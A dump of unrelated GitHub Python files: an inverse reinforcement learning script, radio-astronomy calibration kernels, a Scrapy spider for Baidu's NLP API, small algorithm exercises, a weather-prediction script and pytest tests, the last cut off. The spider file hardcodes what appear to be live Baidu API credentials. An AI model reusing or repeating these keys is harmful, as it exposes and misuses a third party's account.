env):\n self.actions = list(range(env.action_space.n))\n self.num_states = env.observation_space.n\n self.rewards = tfe.Variable(tf.random_uniform(\n [env.observation_space.n]),\n name=\"rewards\")\n \"\"\"\n self.rewards = tfe.Variable(initial_value=[0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0,],\n name=\"rewards\")\n \"\"\"\n self._updater = tfe.implicit_gradients(self.loss)\n\n \"\"\"\n def value_estimate(self, steps, gamma):\n values = {}\n counts = {}\n for i, t in enumerate(steps):\n rewards = [self.rewards[s] for s in t]\n for j, s in enumerate(t):\n discounteds = [r * (gamma ** k)\n for k, r in enumerate(rewards[j:])]\n discounted = tf.reduce_sum(discounteds)\n if s not in values:\n values[s] = discounted\n counts[s] = 0.0\n\n counts[s] += 1\n values[s] = tf.add(values[s], tf.divide(\n tf.subtract(discounted, values[s]),\n counts[s]))\n\n value_tensors = []\n total_count = sum([counts[s] for s 
in counts])\n for i in range(self.rewards.shape[0].value):\n if i in values:\n visit = counts[i] / total_count\n value = tf.multiply(values[i], visit)\n else:\n value = tf.constant(0.0)\n value_tensors.append(value)\n values = tf.stack(value_tensors)\n return values\n \"\"\"\n\n def value_estimate(self, trajectory, gamma):\n values = {}\n one_host_trajectory = tf.one_hot(trajectory, self.num_states)\n rewards = tf.reduce_sum(one_host_trajectory * self.rewards, axis=1)\n for i, r in enumerate(rewards):\n future = [_r * (gamma ** (k + 1))\n for k, _r in enumerate(rewards[(i + 1):])]\n reward = r + tf.reduce_sum(future)\n s = trajectory[i]\n values[s] = reward\n\n value_tensors = []\n for i in range(self.num_states):\n if i in values:\n value = values[i]\n else:\n value = tf.constant(0.0)\n value_tensors.append(value)\n values = tf.stack(value_tensors)\n return values\n\n def get_rewards(self):\n return self.rewards.numpy()\n\n def loss(self, teacher_steps, steps, gamma):\n teacher_values = tf.stack([self.value_estimate(t, gamma) for t in teacher_steps])\n values = tf.stack([self.value_estimate(t, gamma) for t in steps])\n best = tf.reduce_mean(teacher_values, axis=0)\n diff = tf.reduce_min(best - values, axis=0)\n #print(\">>>>>>>>\")\n #print(tf.reshape(best, (4, 4)))\n #print(tf.reshape(tf.reduce_mean(values, axis=0), (4, 4)))\n\n loss = tf.reduce_sum(tf.boolean_mask(diff, diff > 0))\n penalty = -2 * tf.reduce_sum(tf.boolean_mask(diff, diff < 0))\n loss += penalty\n\n #_loss = _loss + 1.5 * tf.reduce_sum(tf.abs(self.rewards))\n return loss\n\n def update(self, optimizer, teacher_steps, steps, gamma):\n loss = self.loss(teacher_steps, steps, gamma)\n optimizer.apply_gradients(self._updater(teacher_steps, steps, gamma))\n return loss, self.get_rewards()\n\n def take_action(self, Q, state, actions, epsilon=0.1):\n rand_action = np.random.randint(len(actions))\n if np.random.random() < epsilon:\n return rand_action\n elif state in Q and sum(Q[state]) != 0:\n return np.argmax(Q[state])\n else:\n return rand_action\n\n def estimate(self, env, teacher, episode_count=3000,\n teacher_demo_size=256, batch_size=32,\n learning_rate=1e-3, max_step=10,\n gamma=0.9, report_interval=10):\n\n # Accumulate teacher's demonstration\n demos = []\n for e in range(teacher_demo_size):\n s = env.reset()\n done = False\n trajectory = [s]\n while not done:\n a = teacher.policy(s)\n n_state, reward, done, info = env.step(a)\n s = n_state\n trajectory.append(s)\n demos.append(trajectory)\n\n print(\"Start reward estimation.\")\n actions = list(range(env.action_space.n))\n rewards = np.zeros((env.observation_space.n))\n Q = defaultdict(lambda: [0] * len(actions))\n optimizer = tf.train.AdamOptimizer(learning_rate)\n\n for e in range(episode_count):\n batch = []\n total_reward = 0\n for b in range(batch_size):\n s = env.reset()\n done = False\n trajectory = [s]\n step = 0\n epsilon = 1.0\n while not done and step < max_step:\n a = self.take_action(Q, s, actions, epsilon)\n n_state, reward, done, info = env.step(a)\n\n estimated = Q[s][a]\n gain = rewards[n_state] + gamma * max(Q[n_state])\n Q[s][a] += learning_rate * (gain - estimated)\n s = n_state\n trajectory.append(s)\n step += 1\n epsilon = epsilon * ((batch_size - b) / batch_size)\n else:\n total_reward += reward\n batch.append(trajectory)\n\n teacher_batch = np.random.choice(demos, size=batch_size)\n loss, new_rewards = self.update(optimizer,\n teacher_batch, batch, gamma)\n\n rewards = new_rewards\n\n if e % 10 == 0:\n print(\"At episode {}, reward={}, 
loss={}\".format(\n e, total_reward, loss))\n print(\"Reward\")\n print(new_rewards.reshape(4, 4))\n\n\ndef main(train):\n env = gym.make(\"FrozenLakeEasy-v0\")\n path = os.path.join(os.path.dirname(__file__), \"irl_teacher.pkl\")\n\n if train:\n agent = TeacherAgent.train(env)\n agent.save(path)\n else:\n teacher = TeacherAgent.load(env, path)\n irl = IRL(env)\n irl.estimate(env, teacher)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Imitation Learning\")\n parser.add_argument(\"--train\", action=\"store_true\",\n help=\"train teacher model\")\n\n args = parser.parse_args()\n main(args.train)\n","repo_name":"icoxfog417/baby-steps-of-rl-ja","sub_path":"IRL/backups/irl_from_traj.py","file_name":"irl_from_traj.py","file_ext":"py","file_size_in_byte":9805,"program_lang":"python","lang":"en","doc_type":"code","stars":403,"dataset":"github-code","pt":"71"}
+{"seq_id":"72680787749","text":"# CubiCal: a radio interferometric calibration suite\n# (c) 2017 Rhodes University & Jonathan S. Kenyon\n# http://github.com/ratt-ru/CubiCal\n# This code is distributed under the terms of GPLv2, see LICENSE.md for details\n\"\"\"\nCython kernels for the phase-only gain machine. Functions require output arrays to be \nprovided. Common dimensions of arrays are:\n\n+----------------+------+\n| Dimension | Size |\n+================+======+\n| Direction | d |\n+----------------+------+\n| Model | m |\n+----------------+------+\n| Time | t |\n+----------------+------+\n| Time Intervals | ti |\n+----------------+------+\n| Frequency | f |\n+----------------+------+\n| Freq Intervals | fi |\n+----------------+------+\n| Antenna | a |\n+----------------+------+\n| Correlation | c |\n+----------------+------+\n\n\"\"\"\nfrom builtins import range\n\nimport numpy as np\nfrom numba import jit, prange\n\nimport cubical.kernels\nfrom cubical.kernels import generics\nfrom cubical.kernels import full_complex\nfrom cubical.kernels import diag_complex\n\nuse_parallel = True if cubical.kernels.num_omp_threads > 1 else False\nuse_cache = cubical.kernels.use_cache\n\nallocate_vis_array = full_complex.allocate_vis_array\nallocate_gain_array = full_complex.allocate_gain_array\nallocate_flag_array = full_complex.allocate_flag_array\nallocate_param_array = full_complex.allocate_param_array\n\n@jit(nopython=True, fastmath=True, parallel=use_parallel, cache=use_cache, nogil=True)\ndef compute_jhj(m, jhj, t_int=1, f_int=1):\n \"\"\"\n Given the model array, computes the diagonal entries of J\\ :sup:`H`\\J. J\\ :sup:`H`\\J is computed\n over intervals. This is an approximation of the Hessian. In the phase-only case, this\n approximation does not depend on the gains, therefore it does not vary with iteration.\n\n Args:\n m (np.complex64 or np.complex128):\n Typed memoryview of model array with dimensions (d, m, t, f, a, a, c, c).\n jhj (np.complex64 or np.complex128):\n Typed memoryview of J\\ :sup:`H`\\J array with dimensions (d, ti, fi, a, c, c). Must be zero-filled.\n t_int (int):\n Number of time slots per solution interval.\n f_int (int):\n Number of frequencies per solution interval.\n \"\"\"\n\n n_dir = m.shape[0]\n n_mod = m.shape[1]\n n_tim = m.shape[2]\n n_fre = m.shape[3]\n n_ant = m.shape[4]\n\n all_bls = np.array([[i,j] for i in range(n_ant) for j in range(n_ant) if i!=j])\n n_bl = all_bls.shape[0]\n\n broadcast_times = np.array([t//t_int for t in range(n_tim)])\n broadcast_freqs = np.array([f//f_int for f in range(n_fre)])\n\n for ibl in prange(n_bl):\n aa, ab = all_bls[ibl,0], all_bls[ibl,1]\n for i in range(n_mod):\n for t in range(n_tim):\n bt = broadcast_times[t]\n for f in range(n_fre):\n bf = broadcast_freqs[f]\n for d in range(n_dir):\n\n m00 = m[d,i,t,f,aa,ab,0,0]\n m01 = m[d,i,t,f,aa,ab,0,1]\n m10 = m[d,i,t,f,aa,ab,1,0]\n m11 = m[d,i,t,f,aa,ab,1,1]\n\n jhj[d,bt,bf,aa,0,0] += (m00*m00.conjugate() + m01*m01.conjugate())\n jhj[d,bt,bf,aa,1,1] += (m10*m10.conjugate() + m11*m11.conjugate())\n\n@jit(nopython=True, fastmath=True, parallel=use_parallel, cache=use_cache, nogil=True)\ndef compute_jhr(gh, jh, r, jhr, t_int=1, f_int=1):\n \"\"\"\n Given the conjugate gains, J\\ :sup:`H` and the residual (or observed data, in special cases),\n computes J\\ :sup:`H`\\R. 
J\\ :sup:`H`\\R is computed over intervals.\n\n Args:\n gh (np.complex64 or np.complex128):\n Typed memoryview of gain array with dimension (d, ti, fi, a, c, c).\n jh (np.complex64 or np.complex128):\n Typed memoryview of J\\ :sup:`H` array with dimensions (d, m, t, f, a, a, c, c).\n r (np.complex64 or np.complex128):\n Typed memoryview of residual array with dimensions (m, t, f, a, a, c, c).\n jhr (np.complex64 or np.complex128):\n Typed memoryview of J\\ :sup:`H`\\R array with dimensions (d, ti, fi, a, c, c).\n t_int (int):\n Number of time slots per solution interval.\n f_int (int):\n Number of frequencies per solution interval.\n \"\"\"\n\n n_dir = jh.shape[0]\n n_mod = jh.shape[1]\n n_tim = jh.shape[2]\n n_fre = jh.shape[3]\n n_ant = jh.shape[4]\n g_dir = gh.shape[0]\n\n all_bls = np.array([[i,j] for i in range(n_ant) for j in range(n_ant) if i!=j])\n n_bl = all_bls.shape[0]\n\n broadcast_times = np.array([t//t_int for t in range(n_tim)])\n broadcast_freqs = np.array([f//f_int for f in range(n_fre)])\n broadcast_dirs = np.array([d%g_dir for d in range(n_dir)])\n\n for ibl in prange(n_bl):\n aa, ab = all_bls[ibl,0], all_bls[ibl,1]\n for i in range(n_mod):\n for t in range(n_tim):\n bt = broadcast_times[t]\n for f in range(n_fre):\n bf = broadcast_freqs[f]\n for d in range(n_dir):\n bd = broadcast_dirs[d]\n\n r00 = r[i,t,f,aa,ab,0,0]\n r01 = r[i,t,f,aa,ab,0,1]\n r10 = r[i,t,f,aa,ab,1,0]\n r11 = r[i,t,f,aa,ab,1,1]\n\n jhh00 = jh[d,i,t,f,ab,aa,0,0]\n jhh01 = jh[d,i,t,f,ab,aa,0,1]\n jhh10 = jh[d,i,t,f,ab,aa,1,0]\n jhh11 = jh[d,i,t,f,ab,aa,1,1]\n\n jhr[d,bt,bf,aa,0,0] += gh[bd,bt,bf,aa,0,0] * (r00*jhh00 + r01*jhh10)\n jhr[d,bt,bf,aa,1,1] += gh[bd,bt,bf,aa,1,1] * (r10*jhh01 + r11*jhh11)\n\n@jit(nopython=True, fastmath=True, parallel=use_parallel, cache=use_cache, nogil=True)\ndef compute_update(jhr, jhjinv, upd):\n \"\"\"\n Given J\\ :sup:`H`\\R and (J\\ :sup:`H`\\J)\\ :sup:`-1`, computes the gain update. The dimensions of\n the input should already be consistent, making this operation simple. 
These arrays are real\n valued.\n\n Args:\n jhr (np.float32 or np.float64):\n Typed memoryview of J\\ :sup:`H`\\R array with dimensions (d, ti, fi, a, c, c).\n jhjinv (np.float32 or np.float64):\n Typed memoryview of (J\\ :sup:`H`\\J)\\ :sup:`-1` array with dimensions\n (d, ti, fi, a, c, c).\n upd (np.float32 or np.float64):\n Typed memoryview of gain update array with dimensions (d, ti, fi, a, c, c).\n \"\"\"\n\n n_dir = jhr.shape[0]\n n_tim = jhr.shape[1]\n n_fre = jhr.shape[2]\n n_ant = jhr.shape[3]\n\n for aa in prange(n_ant):\n for t in range(n_tim):\n for f in range(n_fre):\n for d in range(n_dir):\n upd[d,t,f,aa,0,0] = jhjinv[d,t,f,aa,0,0]*jhr[d,t,f,aa,0,0]\n upd[d,t,f,aa,0,1] = upd[d,t,f,aa,1,0] = 0\n upd[d,t,f,aa,1,1] = jhjinv[d,t,f,aa,1,1]*jhr[d,t,f,aa,1,1]\n\n# Remaining kernel functions are reused.\n\n# J^H is computed assuming diagonal gains.\ncompute_jh = diag_complex.compute_jh\n\n# J^H.J inverse is computed assuming diagonal blocks.\ncompute_jhjinv = generics.compute_diag_inverse\n\n# Residuals computed assuming diagonal gains.\ncompute_residual = diag_complex.compute_residual\n\n# Corrected visibilities computed assuming diagonal gains.\ncompute_corrected = diag_complex.compute_corrected\n\n# Gains applied as diagonal.\napply_gains = diag_complex.apply_gains\n\n# Gains inverted as diagonal.\ninvert_gains = generics.compute_diag_inverse\n","repo_name":"ratt-ru/CubiCal","sub_path":"cubical/kernels/phase_only.py","file_name":"phase_only.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"}
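`compute_jhj` above accumulates, per antenna and solution interval, only the diagonal of J^H J from the model visibilities: entry (0,0) collects |m00|^2 + |m01|^2 over all baselines, times and frequencies falling in the interval. A tiny pure-numpy version for a single time/frequency slot (a readability sketch, not the numba kernel):

import numpy as np

def jhj_diag_one_slot(model):
    # model: complex (n_ant, n_ant, 2, 2) visibilities for one time/freq slot.
    # Returns (n_ant, 2): the two diagonal JHJ entries per antenna.
    n_ant = model.shape[0]
    jhj = np.zeros((n_ant, 2))
    for aa in range(n_ant):
        for ab in range(n_ant):
            if aa == ab:
                continue                      # skip autocorrelations
            m = model[aa, ab]
            jhj[aa, 0] += abs(m[0, 0])**2 + abs(m[0, 1])**2
            jhj[aa, 1] += abs(m[1, 0])**2 + abs(m[1, 1])**2
    return jhj

rng = np.random.default_rng(0)
vis = rng.normal(size=(3, 3, 2, 2)) + 1j * rng.normal(size=(3, 3, 2, 2))
print(jhj_diag_one_slot(vis))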
+{"seq_id":"71896641831","text":"from scrapy import Spider, Request\nimport pymongo\nimport json\nfrom aip import AipNlp\n\nfrom ltp.settings import tdb\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '10209496'\nAPI_KEY = 'MrUvMIK1x0kI2wsxZ5wrxZuU'\nSECRET_KEY = 'at8ObT3K6ruzgB4tg2TIz9Tb8visZkY8'\n\nclient = AipNlp(APP_ID, API_KEY, SECRET_KEY)\napi_url='https://aip.baidubce.com/rpc/2.0/nlp/v2/comment_tag'\n\nclass BDSpider(Spider):\n name = 'BD'\n\n def start_requests(self):\n comments = tdb.meituan_comment.find({'baidu_result': None})\n for item in comments:\n yield Request(url=api_url,method='POST',body={\n \"text\": \"三星电脑电池不给力\",\n \"type\": 13\n })\n\n\n\n","repo_name":"xudaashuai/ChanXueYanCrawl","sub_path":"ltp/spiders/BDSpider.py","file_name":"BDSpider.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"70120275750","text":"# Find all pairs of integers whose sum is equal to a given number\nfrom typing import List, Tuple, Set\n\n\ndef two_sum(numbers: List[int], target: int) -> List[Tuple[int, int]]:\n result: List[Tuple[int, int]] = list()\n seen: Set[int] = set()\n\n for value in numbers:\n complement = target - value\n\n if complement in seen:\n result.append((value, complement))\n\n seen.add(value)\n\n return result\n\n\nprint(two_sum([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 5))\n","repo_name":"pupo84/algorithms-data-structures","sub_path":"list/exercises/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29808828016","text":"#Author: BrennaNieva\n#Date: 10/15/2019\n#Description: CSCI 141 [40828] ML Project for Weather Prediction\n\n\n\n###############################################################################\n\nATTRS = []\nATTRS.append(\"Station\")\nATTRS.append(\"Location\")\nATTRS.append(\"Date\")\nATTRS.append(\"Precipitation\")\nATTRS.append(\"TMAX\")\nATTRS.append(\"TMIN\")\nATTRS.append(\"TOBS\")\n#Time of Observation Bias\n# different times of day exert different temperatures, TOBS used to caluc\n\n\n###############################################################################\n\n\n\ndef make_training_set(Jan2019):\n \"\"\" Compiles a training set from JAN2019 (CSV file) and creates dictionary (weather_records) with attributes labeled Station, Location, Date, Precipitation, Max Temperature (TMAX) and Minimum Temperature(TMIN)\n \n \"\"\"\n\n\n\n weather_records = []\n # Read in file\n with open(Jan2019) as file:\n #Skip header line in file\n next(file)\n for line in file:\n if '#' in line:\n continue\n line = line.strip('\\n')\n line_list = line.split(',')\n\n # Create a dictionary for the line and map the attributes in\n # ATTRS to the corresponding values in the line of the file\n record = {}\n\n # Read Station ID as an string:\n record[ATTRS[0]] = str(line_list[0].strip(\"\\\"\"))\n\n #Read Location as a string:\n record[ATTRS[1]] = str(line_list[1].strip(\"\\\"\"))\n\n #Read Date as a string:\n record[ATTRS[2]] = str(line_list[3].strip(\"\\\"\"))\n\n #Read Precipitation as a float:\n record[ATTRS[3]] = str(line_list[4].strip(\"\\\"\"))\n\n #Checks if TMAX and TMIN are empty, if so, sets their value to 0\n #Avoids list overflow error\n if line_list[5].strip(\"\\\"\") == '':\n record[ATTRS[4]] = 0\n record[ATTRS[5]] = 0\n else:\n #Read TMAX as a int:\n record[ATTRS[4]] = int(line_list[5].strip(\"\\\"\"))\n\n #Read TMIN as a int:\n record[ATTRS[5]] = int(line_list[6].strip(\"\\\"\"))\n\n # Add the dictionary to a list\n weather_records.append(record)\n\n\n return weather_records\n\n\n\n#Executes function and prints the results\ntraining_data = (make_training_set('TrainingSets/Jan2019.csv'))\n# print(training_data)\n\n\ndef compute_mean(list):\n ''' Computes the average of the list'''\n average = sum(list) / len(list)\n return average\n\ndef compare_predictions(predictions,today):\n '''Compares the difference between the prediction and \"todays\" actual temperature'''\n for i in predictions:\n \n comparision = i - int(today)\n return comparision\n\ndef predict_equal(yesterday):\n '''Takes yesterday's temperature and calculates that tomorrows temperature will be the same as yesterday'''\n \n\n \n\n TomorrowTempPredict = int(training_data[i-1].get('TMAX'))\n\n return TomorrowTempPredict\n\n \ndef predict_linear(yesterday):\n '''Calculates tomorrow's temperature as a linear relationship by using yesterday's temperature and the day before yesterday'''\n\n yesterday = int(training_data[i-1].get('TMAX'))\n \n today_tmax = int(training_data[i].get('TMAX'))\n\n \n two_days_tmax = int(training_data[i-2].get('TMAX'))\n\n\n TomorrowTempPredict = today_tmax + (yesterday - two_days_tmax)\n return TomorrowTempPredict\n\n\n \n \n\n\n#Calculates single date's temp difference\n\nif __name__ == \"__main__\":\n\n data_viewed = input(\"To view all weather data from Jan2019, type 'view_all' \\n otherwise, please specifiy a date to forecast the following day's temperature (YYYY-MM-DD): \")\n\n if data_viewed == \"view_all\":\n lin_predictions = []\n eq_predictions = []\n lin_errors = 
[]\n eq_errors = []\n \n\n for i in range(len(training_data)):\n today = training_data[i]\n yesterday = training_data[i-1]\n\n today_tmax = int(training_data[i].get('TMAX'))\n today_tmin = int(training_data[i].get('TMIN'))\n\n\n lin_predictions.append(predict_linear(today))\n eq_predictions.append(predict_equal(today))\n\n lin_errors.append(compare_predictions(lin_predictions, today_tmax))\n eq_errors.append(compare_predictions(eq_predictions, today_tmax))\n\n\n\n lin_avg_error = compute_mean(lin_errors)\n eq_avg_error = compute_mean(eq_errors)\n\n print(\"linear predictions: \")\n print(lin_predictions)\n print(\"equal predictions: \")\n print(eq_predictions)\n\n print(\"linear errors: \")\n print(lin_errors)\n\n print(\"equal errors: \")\n print(eq_errors)\n\n print(\"Average error [linear]: \")\n print(lin_avg_error)\n\n print(\"Average error [equal]: \")\n print(eq_avg_error)\n\n else:\n\n print(\"linear prediction: \", predict_linear((data_viewed)))\n print(\"equal prediction: \", predict_equal((data_viewed)))\n\n\n\n\n\n\n\n \n\n \n\n\n\n\n\n\n#To DO\n\n#Take average error for equal\n#Fix Equal Temperature\n#finish CSV parse\n#csv docs\n\n\n\n\n#prediction mech to all take the same arguments so that we can easily swap them in and out\n#given all days at the index of the one you want to predict, here are the different prediction methods and their output\n\n\n\n\n","repo_name":"brennanieva/WeatherPredict","sub_path":"train_copy_so_i_dont_fuck_it_up.py","file_name":"train_copy_so_i_dont_fuck_it_up.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
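`predict_equal` and `predict_linear` above ignore their `yesterday` argument and instead read the loop index `i` and `training_data` from module scope, so the single-date branch at the bottom crashes (no `i` exists yet) and cannot forecast an arbitrary date. One reasonable reading of the intended behavior, written as pure functions of the TMAX series and a day index (an assumption, since the original is broken):

def predict_equal(tmax, i):
    # Persistence forecast: tomorrow's TMAX equals day i's TMAX.
    return tmax[i]

def predict_linear(tmax, i):
    # Extrapolate tomorrow from the current day-to-day trend.
    return tmax[i] + (tmax[i] - tmax[i - 1])

tmax = [30, 32, 35, 33]
print(predict_equal(tmax, 2), predict_linear(tmax, 2))  # 35 38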
+{"seq_id":"74484113829","text":"from datetime import datetime\nfrom helper import *\nfrom editor import *\nfrom dialog import *\n\nclass DemoCtrl(Pub,Sub):\n def __init__(self):\n Pub.__init__(self)\n Sub.__init__(self,self.recv)\n self.ml,self.mt,self.mr,self.mb=10,10,10,10\n self.sbht=27\n self.kmode='cmd' # choose from cmd, edit, dlg\n self.t=0.0\n self.flipflop=False\n self.wnds=[]\n frmrect(self.ml,self.mt,width-self.ml-self.mr,height-self.mt-self.mb-self.sbht,10)\n self.fontocra=createFont('OCRA',14)\n self.bounds=[self.ml+5,self.mt+5,width-self.ml-self.mr-10,height-self.mt-self.mb-self.sbht-10]\n rootwnd=Voidwnd(self.bounds[0],self.bounds[1],self.bounds[2],self.bounds[3])\n self.wnds.insert(0,rootwnd)\n self.actwnd=0\n self.dlgwnd=None\n \n def recv(self,m):\n hdr=m.head\n car,cdr=m.body[0],m.body[1:]\n if car=='stat':\n self.stat('[%s] %s'%(hdr,cdr[0]))\n elif car=='mvbuf':\n self.stat('renaming current buffer to %s'%cdr[0])\n self.wnds[self.actwnd].nm=cdr[0]\n self.dlgwnd=None\n self.kmode='cmd'\n self.renderall()\n else:\n self.stat('unknown msg cmd: %s'%car)\n \n def stat(self,msg):\n fill(0)\n stroke(0)\n rect(0,height-self.sbht,width-1,height-self.sbht)\n stroke(0,255,0)\n fill(0,255,0)\n textFont(self.fontocra)\n textSize(14)\n textAlign(LEFT,TOP)\n text('| %s |'%msg,5,height-self.sbht+3)\n noFill()\n \n def mkdlg(self,promptmsg):\n if self.dlgwnd:\n self.stat('dialog currently active!')\n return\n self.stat('readying dialog prompt...')\n dw=300\n dh=100\n self.dlgwnd=Txtdlg(width/2-dw/2,height/2-dh/2,dw,dh,promptmsg)\n self.dlgwnd.addsub(self)\n self.kmode='dlg'\n \n def mked(self,nm):\n if self.actwnd==-1:\n self.stat('no active window')\n return\n self.stat('ed...')\n if isinstance(self.wnds[self.actwnd],Ed):\n print('cannot overwrite current editor!')\n return\n vw=self.wnds[self.actwnd]\n self.wnds[self.actwnd]=Ed(vw.x,vw.y,vw.w,vw.h,nm)\n self.wnds[self.actwnd].addsub(self)\n \n def renderall(self):\n wiperect(self.bounds[0],self.bounds[1],self.bounds[2],self.bounds[3],color(0,0,0))\n for i in range(len(self.wnds)):\n if i==self.actwnd:\n self.wnds[i].render(color(0,255,0))\n else:\n self.wnds[i].render(color(0,128,0))\n if self.dlgwnd:\n self.dlgwnd.wipe()\n self.dlgwnd.render(color(0,255,128))\n \n def blinkcursor(self):\n if self.kmode=='edit':\n self.t+=0.05\n if frameCount%50==0:\n if self.flipflop:\n self.wnds[self.actwnd].rendercursor(color(0,255,0))\n else:\n self.wnds[self.actwnd].rendercursor(color(0,0,0))\n self.flipflop=not self.flipflop\n \n def vsplit(self,frac):\n self.stat('vertical split')\n cw=self.wnds[self.actwnd]\n cw.wipe()\n wfrac=frac*cw.w\n rfrac=cw.w-wfrac\n mp=cw.x+wfrac\n dmw=3\n cw.w=wfrac-dmw\n nw=Voidwnd(mp+dmw,cw.y,rfrac-dmw,cw.h)\n self.wnds.insert(self.actwnd+1,nw)\n \n def hsplit(self,frac):\n self.stat('horizontal split')\n cw=self.wnds[self.actwnd]\n cw.wipe()\n hfrac=frac*cw.h\n rfrac=cw.h-hfrac\n mp=cw.y+hfrac\n dmh=3\n cw.h=hfrac-dmh\n nw=Voidwnd(cw.x,mp+dmh,cw.w,rfrac-dmh)\n self.wnds.insert(self.actwnd+1,nw)\n \n def bye(self):\n self.stat('bye!')\n exit()\n \n def screenshot(self):\n self.stat('screengrab')\n save('img/demo_01a_%s.png'%(datetime.today().strftime('%Y%m%d_%H%M%S')))\n \n def nextwnd(self):\n self.actwnd=(self.actwnd+1)%len(self.wnds)\n self.stat('active window index: %d'%self.actwnd)\n \n def prevwnd(self):\n self.actwnd-=1\n if self.actwnd<0:\n self.actwnd=len(self.wnds)-1\n self.stat('active window index: %d'%self.actwnd)\n \n def insmode(self):\n if self.actwnd==-1:\n self.stat('no editor active!')\n elif not 
isinstance(self.wnds[self.actwnd],Ed):\n self.stat('active window is not an editor!')\n else:\n self.stat('- insert -')\n self.kmode='edit'\n \n def writecurbuf(self):\n if self.actwnd==-1:\n self.stat('no editor active!')\n elif not isinstance(self.wnds[self.actwnd],Ed):\n self.stat('active window is not an editor!')\n else:\n self.wnds[self.actwnd].savebuffer()\n \n def loadfile(self):\n pass\n \n def cmdhandler(self,k,kc):\n print('[cmd] (%s,%s)'%(kc,k))\n if k=='q':\n self.bye()\n if k=='s':\n self.screenshot()\n elif k=='v':\n self.vsplit(0.5)\n elif k=='V':\n self.vsplit(0.75)\n elif k=='h':\n self.hsplit(0.5)\n elif k=='H':\n self.hsplit(0.75)\n elif k=='n':\n self.nextwnd()\n elif k=='p':\n self.prevwnd()\n elif k=='e':\n self.mked('%s'%(datetime.today().strftime('%Y%m%d_%H%M%S')))\n elif k=='i':\n self.insmode()\n elif k=='w':\n self.writecurbuf()\n elif k=='o':\n self.loadfile()\n elif k=='r':\n self.mkdlg('new current buffer name:')\n self.renderall()\n \n def currenteditor(self):\n return self.wnds[self.actwnd]\n","repo_name":"heerdyes/processing-sketching","sub_path":"demo/dvI/democtrl.py","file_name":"democtrl.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
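`DemoCtrl` above mixes in `Pub` and `Sub` from the `helper` module, which the record does not show; messages evidently carry a `head` plus a `body` list and are delivered through each subscriber's `recv`. A minimal sketch of a compatible pair (an assumed shape inferred from the calls above, not the repo's verified code):

class Msg:
    def __init__(self, head, body):
        self.head, self.body = head, body

class Pub:
    def __init__(self):
        self._subs = []

    def addsub(self, sub):
        self._subs.append(sub)

    def publish(self, head, body):
        for sub in self._subs:          # fan the message out to every subscriber
            sub.recv(Msg(head, body))

class Sub:
    def __init__(self, handler):
        self.recv = handler             # DemoCtrl passes its own recv method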
+{"seq_id":"73059847588","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n if not root:\n return root\n queue = collections.deque()\n tempQueue = collections.deque()\n queue.append(root)\n while queue:\n curNode = queue.popleft()\n if curNode.left:\n tempQueue.append(curNode.left)\n if curNode.right:\n tempQueue.append(curNode.right)\n if queue:\n nextNode = queue.popleft()\n curNode.next = nextNode\n queue.insert(0, nextNode)\n else:\n curNode.next = None\n queue.extend(tempQueue)\n tempQueue.clear() \n return root\n","repo_name":"darkleoyue/Leetcode_practice_python","sub_path":"117.py","file_name":"117.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1035509419","text":"import pytest\n\nfrom introduction_fixtures import Address, Gender, Person\n\n@pytest.fixture\ndef address():\n return Address(\n stree_address=\"123 Main Street\",\n postal_code=\"12345\",\n city=\"Anytown\",\n country=\"USA\",\n )\n \n@pytest.fixture\ndef person(address):\n return Person(\n first_name=\"John\",\n last_name=\"Doe\",\n gender=Gender.MALE,\n birthdate=\"1991-01-01\",\n interests=[\"travel\", \"sports\"],\n address=address,\n )\n\ndef test_address_country(address):\n assert address.country == \"USA\"\n \ndef test_person_first_name(person):\n assert person.first_name == \"John\"\n \ndef test_person_address_city(person):\n assert person.address.city == \"Anytown\"","repo_name":"dimsplendid/fastapi-data-science","sub_path":"chapter9/introduction_fixtures_test.py","file_name":"introduction_fixtures_test.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36131307271","text":"import pytest\nfrom creator.files.models import File, FileType\nfrom creator.ingest_runs.models import IngestRun\nfrom creator.ingest_runs.tasks import (\n run_ingest,\n cancel_ingest,\n cancel_validation,\n ingest_genomic_workflow_output_manifests,\n)\nfrom creator.ingest_runs.factories import ValidationRunFactory, ValidationRun\n\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\n\n@pytest.fixture\ndef mock_enqueue(mocker):\n \"\"\"\n Mock the django_eq.enqueue function.\n \"\"\"\n enqueue = mocker.patch(\"creator.ingest_runs.tasks.django_rq.enqueue\")\n return enqueue\n\n\ndef test_run_ingest(db, mocker, clients, prep_file):\n \"\"\"\n Test the run_ingest function.\n \"\"\"\n client = clients.get(\"Administrator\")\n mock_genomic_workflow = mocker.patch(\n \"creator.ingest_runs.tasks.ingest_run\"\n \".ingest_genomic_workflow_output_manifests\"\n )\n user = User.objects.first()\n\n # Create data. The last Version will have a non-GWO FileType\n for _ in range(3):\n prep_file(authed=True)\n files = list(File.objects.all())\n for file_ in files[:-1]:\n file_.file_type = FileType.GWO.value\n file_.save()\n file_versions = [f.versions.first() for f in files]\n\n \"\"\"\n 1) Happy Case\n Call run_ingest. Check that genomic_file_workflow got\n called. 